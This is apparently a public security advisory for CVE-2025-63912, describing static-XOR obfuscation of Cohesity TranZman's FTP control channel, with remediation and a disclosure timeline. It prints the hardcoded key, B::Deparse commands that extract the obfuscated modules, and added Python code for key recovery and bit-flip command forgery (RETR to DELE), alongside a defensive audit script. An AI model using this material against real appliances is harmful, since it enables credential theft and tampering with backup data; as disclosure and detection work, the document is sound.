@GregDurys
Created March 2, 2026 17:29
CVE-2025-63912 - Cohesity TranZman Weak Cryptography (Static XOR)

CVE-2025-63912: Weak Cryptography in Cohesity TranZman

Overview

Field              Value
CVE ID             CVE-2025-63912
CVSS v3.1          5.5 (Medium)
Vector             AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
CWE                CWE-327: Use of a Broken or Risky Cryptographic Algorithm
Vendor             Cohesity, Inc.
Product            TranZman Migration Appliance
Affected Versions  Release 4.0 Build 14614, including patch TZM_1757588060_SEP2025_FULL.depot

Description

The TranZman FTP service on port 55555/TCP wraps its control channel in XOR with a single static key that is hardcoded in the shipped Perl modules. This is obfuscation rather than encryption: the key is the same on every appliance, it can be read from the on-disk modules or recovered from captured traffic by XORing a ciphertext against known plaintext (for example the fixed server greeting), and once it is known every session can be decrypted. Because XOR carries no integrity protection, captured commands can also be modified or replayed.

Vendor documentation describes TranZman as a backup/transition/recovery product that reads, imports and transfers backup media and files. Wrapping that traffic in an unauthenticated, malleable obfuscation layer therefore puts both the confidentiality and the integrity of backup data at risk.

Impact

An attacker or eavesdropper who can observe the control channel or obtain the static key can:

  • Decrypt the entire control conversation (credentials, filenames, commands), revealing backup file names and other sensitive resources
  • Forge or modify commands (XOR is malleable, so flipping ciphertext bits flips the corresponding plaintext bits) or replay already-authenticated commands, allowing unauthorised retrieval or tampering of files
  • Issue commands the appliance does not record, because lines matching SITE log ... are suppressed from the server log, reducing accountability and hindering incident response

Attack Vector

  1. The attacker positions themselves to capture traffic on the network segment where TranZman operates, or obtains the static key from the appliance
  2. Capture FTP control channel traffic on port 55555/TCP
  3. Apply XOR decryption with the static key to reveal the plaintext commands (without the key, XOR a captured server banner against the known greeting to recover key bytes first)
  4. Identify file transfer commands (e.g., RETR backup-2025-09-15.tar.gz)
  5. Replay captured commands, or bit-flip them into different commands, to retrieve or tamper with backup files and exfiltrate sensitive data

Technical Details

The TranZman FTP daemon runs as root and is launched via a Perl wrapper that loads obfuscated modules from .pmt files:

$ ps auxfww | egrep 'ftpd\.pl|perl -x'
root 456159 ... perl -x -wT /opt/SRLtzm/scripts/perl/ftpd.pl -S

The obfuscation scheme (SRLCRYPT) works as follows:

  • A fixed ASCII header SRLCRYPT, followed by the plaintext XORed with a hardcoded static key embedded in the code
  • No IV or nonce, so identical plaintexts produce identical ciphertexts and any known plaintext leaks the corresponding key bytes; no integrity check; the same transform is used in both directions
  • The server banner arrives as SRLCRYPT... and decrypts to a standard FTP greeting (220 FTP server ready.)

Example of decrypting the FTP banner:

$ timeout 2 ncat localhost 55555 > /tmp/ftp_response.bin
$ perl -I/opt/SRLtzm/lib -MSRCrypt::srcrypt -e \
    'local $/; print SRCrypt::srcrypt::srldecrypt(scalar <>);' \
    /tmp/ftp_response.bin
220 FTP server ready.

Commands must be sent as SRLCRYPT + XOR. Standard FTP responses are returned after decryption (e.g., 331 Username OK, 530 Not logged in).

Additional concerns:

  • The FTP server suppresses logging for lines matching SITE log ..., creating an audit blind spot on the appliance itself
  • No TLS/FTPS is offered on this control channel
  • Replays and bit-flips are feasible: any observer can decrypt, forge, or replay commands, and the server has no way to tell a forged frame from a genuine one

Static XOR Key

The hardcoded key is a plaintext copyright string:

(C) Stone Ram Limited 2016 - empower the move with TranZman - Backup Transition Manager

This key is embedded in the SRCrypt::srcrypt module and used for both encryption and decryption (XOR is its own inverse). Since the string is identical on every installation, extracting it once compromises the control channel of all deployments, not just the appliance it was taken from.
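The following is an added example, not code from the gist or from the TranZman product. It models the SRLCRYPT framing described under Technical Details with the key quoted above and demonstrates the three consequences the advisory lists: decryption with the static key, key recovery from a single captured banner via known plaintext (no appliance access needed), and bit-flip forgery of a captured command without any key at all. Two details are assumptions, because the page does not state them: the key is applied cyclically over the payload, and FTP lines end in CRLF.

```python
# Added example (not from the gist or the product): a model of the SRLCRYPT
# framing described in the advisory, used to show why a static XOR key gives
# neither confidentiality nor integrity.  Assumptions not stated on the page:
# the key is applied cyclically over the payload, and FTP lines end in CRLF.
HEADER = b"SRLCRYPT"
# Hardcoded key as quoted in the advisory.
KEY = b"(C) Stone Ram Limited 2016 - empower the move with TranZman - Backup Transition Manager"
GREETING = b"220 FTP server ready.\r\n"   # fixed first server line, as on the page


def xor_with_key(data: bytes, key: bytes = KEY) -> bytes:
    """XOR data with a repeating key. One function serves both directions."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def srl_wrap(plaintext: bytes, key: bytes = KEY) -> bytes:
    """Produce a wire blob: fixed header followed by the XORed payload."""
    return HEADER + xor_with_key(plaintext, key)


def srl_unwrap(blob: bytes, key: bytes = KEY) -> bytes:
    """Reverse srl_wrap. There is no MAC, so any blob carrying the header 'decrypts'."""
    if not blob.startswith(HEADER):
        raise ValueError("missing SRLCRYPT header")
    return xor_with_key(blob[len(HEADER):], key)


def recover_key_material(blob: bytes, known_plaintext: bytes) -> bytes:
    """Known-plaintext attack: c XOR p == k.  The first server line is always the
    fixed greeting, so one captured banner yields len(greeting) key bytes
    without any access to the appliance."""
    body = blob[len(HEADER):len(HEADER) + len(known_plaintext)]
    return bytes(c ^ p for c, p in zip(body, known_plaintext))


def forge_command(blob: bytes, known_plaintext: bytes, new_plaintext: bytes) -> bytes:
    """Bit-flip attack on a captured command, no key required: since c = p XOR k,
    c XOR p XOR p' is a valid ciphertext for p'.  Lengths must match so the
    same key bytes line up under the replacement."""
    if len(known_plaintext) != len(new_plaintext):
        raise ValueError("replacement must be the same length as the original")
    body = bytearray(blob[len(HEADER):])
    for i, (p, q) in enumerate(zip(known_plaintext, new_plaintext)):
        body[i] ^= p ^ q
    return HEADER + bytes(body)


def demo() -> dict:
    """Walk through the three weaknesses on constructed traffic."""
    banner = srl_wrap(GREETING)                        # what the server sends
    leaked = recover_key_material(banner, GREETING)    # the eavesdropper's view
    # Constructed client command; the file name is the advisory's own example.
    original = b"RETR backup-2025-09-15.tar.gz\r\n"
    captured = srl_wrap(original)
    tampered = forge_command(captured, original, b"DELE backup-2025-09-15.tar.gz\r\n")
    return {
        "banner_plain": srl_unwrap(banner),
        "key_prefix_matches": leaked == KEY[:len(GREETING)],
        "forged_plain": srl_unwrap(tampered),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

The forgery step is the practical reason "static XOR" is worse than merely "weak": an attacker who only ever sees ciphertext can still turn a captured RETR into a DELE of the same file, and the server has no integrity check with which to notice.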

Extracting the XOR Key

The .pmt modules are obfuscated on disk and the loader deletes its temporary files at runtime, so no plaintext source is left behind for review. That does not matter once the code has been compiled: B::Deparse regenerates Perl source from the op-tree of the subroutines already loaded in memory, bypassing the on-disk obfuscation entirely. To extract the source, load the module and deparse every subroutine in its package:

# Dump the crypto module (contains the XOR key)
perl -we '
  use lib "/opt/SRLtzm/lib";
  require SRCrypt::srcrypt;
  use B::Deparse;
  my $d = B::Deparse->new("-p","-sC");
  no strict "refs";
  for my $sym (sort keys %{"SRCrypt::srcrypt::"}) {
    my $fq = "SRCrypt::srcrypt::$sym";
    my $cr = *{$fq}{CODE} or next;
    print $d->coderef2text($cr), "\n";
  }
' > /tmp/SRCrypt_srcrypt_deparsed.pl

# Dump the FTP server module (shows log suppression logic)
perl -we '
  use lib "/opt/SRLtzm/lib";
  require SRCrypt::FTPServer;
  use B::Deparse;
  my $d = B::Deparse->new("-p","-sC");
  no strict "refs";
  for my $sym (sort keys %{"SRCrypt::FTPServer::"}) {
    my $fq = "SRCrypt::FTPServer::$sym";
    my $cr = *{$fq}{CODE} or next;
    print $d->coderef2text($cr), "\n";
  }
' > /tmp/SRCrypt_FTPServer_deparsed.pl

The srcrypt module contains the srlcrypt function (and its srldecrypt counterpart) with the hardcoded XOR key. The FTPServer module shows the FTP command handling and the log suppression logic: lines matching SITE log ... and PASV commands are silently omitted from the server's log.
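Because the appliance omits SITE log and PASV lines from its own log, the only complete record of what was done over port 55555/TCP is one reconstructed off the wire. The following is an added example, not code from the gist or from the product: a sensor-side audit that unwraps the SRLCRYPT framing with the key quoted above, rebuilds a per-command log, and flags the commands the appliance would not have recorded as well as any that touch backup data. It serves both the "Additional concerns" list and the log-suppression note above. Assumptions not stated on the page: the key is applied cyclically, each TCP payload carries exactly one FTP line, and the sample session below is constructed (the user name, password and the SITE log argument are illustrative; the server replies and the RETR target are the advisory's own).

```python
# Added example (not from the gist or the product): network-side audit of the
# TranZman control channel.  The appliance drops "SITE log ..." and PASV from
# its own log, so a sensor that unwraps the SRLCRYPT framing keeps the record
# the appliance does not.  Assumptions: key applied cyclically, one FTP line per
# TCP payload, and SAMPLE_STREAM is constructed rather than captured.
HEADER = b"SRLCRYPT"
KEY = b"(C) Stone Ram Limited 2016 - empower the move with TranZman - Backup Transition Manager"

# Command prefixes the advisory says are omitted from the appliance log.
UNLOGGED_ON_APPLIANCE = ("SITE LOG", "PASV")
# Verbs that read or alter files and always deserve an audit line.
DATA_VERBS = {"RETR", "STOR", "APPE", "DELE", "RNFR", "RNTO"}


def xor_with_key(data: bytes, key: bytes = KEY) -> bytes:
    """Repeating-key XOR; identical in both directions."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def srl_wrap(plaintext: bytes) -> bytes:
    """Used here only to build the constructed sample stream."""
    return HEADER + xor_with_key(plaintext)


def srl_unwrap(blob: bytes) -> bytes:
    """Strip the SRLCRYPT header and undo the XOR."""
    if not blob.startswith(HEADER):
        raise ValueError("not an SRLCRYPT frame")
    return xor_with_key(blob[len(HEADER):])


def parse_command(line: bytes) -> tuple:
    """Split an FTP command line into an upper-cased verb and its raw argument."""
    text = line.rstrip(b"\r\n").decode("ascii", "replace")
    verb, _, arg = text.partition(" ")
    return verb.upper(), arg


def audit(stream: list) -> list:
    """stream: (direction, raw TCP payload) in capture order, 'C' for
    client->server and 'S' for server->client.  Returns one audit record per
    client command, with flags for what the appliance itself would not log."""
    records = []
    for direction, blob in stream:
        if direction != "C":
            continue                                   # replies carry no commands
        verb, arg = parse_command(srl_unwrap(blob))
        rec = {"cmd": verb, "arg": arg, "flags": []}
        if verb == "PASS":
            rec["arg"] = "<redacted>"                  # keep secrets out of the SIEM
        if f"{verb} {arg}".strip().upper().startswith(UNLOGGED_ON_APPLIANCE):
            rec["flags"].append("suppressed-on-appliance")
        if verb in DATA_VERBS:
            rec["flags"].append("backup-data-access")
        records.append(rec)
    return records


# Constructed sample session.  User name, password and the "SITE log off"
# argument are illustrative; the replies and the RETR target are from the advisory.
SAMPLE_STREAM = [
    ("S", srl_wrap(b"220 FTP server ready.\r\n")),
    ("C", srl_wrap(b"USER tzmuser\r\n")),
    ("S", srl_wrap(b"331 Username OK\r\n")),
    ("C", srl_wrap(b"PASS s3cret\r\n")),
    ("C", srl_wrap(b"SITE log off\r\n")),
    ("C", srl_wrap(b"PASV\r\n")),
    ("C", srl_wrap(b"RETR backup-2025-09-15.tar.gz\r\n")),
]

if __name__ == "__main__":
    for rec in audit(SAMPLE_STREAM):
        print(rec)
```

Running this on the sample stream yields five records; the SITE log and PASV entries carry the suppressed-on-appliance flag and the RETR carries backup-data-access, which is exactly the trail the appliance's own log would be missing. Redacting PASS before the record leaves the sensor matters because the channel exposes credentials in the clear once unwrapped.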

Remediation

Apply Cohesity patches in the following order:

  1. TZM_patch_1.patch
  2. TZM_1760106063_OCT2025R2_FULL.depot

Contact Cohesity support for the latest OVA version with integrated fixes.

Timeline

Date               Event
26 September 2025  Reported to Cohesity
20 October 2025    Cohesity confirmed fix in patches
25 December 2025   Embargo period ended
27 December 2025   Public disclosure

Credit

Discovered by Greg Durys, LME

References
